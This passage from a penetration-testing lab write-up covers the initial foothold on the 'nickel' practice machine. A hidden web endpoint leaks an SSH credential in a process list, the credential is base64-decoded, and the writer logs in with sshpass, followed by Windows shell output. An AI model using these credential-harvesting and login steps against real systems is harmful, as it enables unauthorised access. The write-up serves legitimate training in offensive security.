SSH


One of the hidden endpoints, /list-running-procs, at the web application on the target port 33333 lists running processes when POST requests are made, which revealed a SSH credential.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ sshpass -p 'Tm93aXNlU2xvb3BUaGVvcnkxMzkK' ssh ariah@$IP
Permission denied, please try again.

However, it fails to authenticate. The credential was for the nickel-dev host, which is different from the target system; nickel

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ echo -n Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 -d
NowiseSloopTheory139

It turned out to be a base64-encoded string; NowiseSloopTheory139

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ sshpass -p NowiseSloopTheory139 ssh ariah@$IP                                                             
 
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
 
ariah@NICKEL C:\Users\ariah> whoami
nickel\ariah
 
ariah@NICKEL C:\Users\ariah> hostname
nickel
 
ariah@NICKEL C:\Users\ariah> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.219.99
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.219.254

Validated Initial Foothold established to the target system as the ariah user via SSH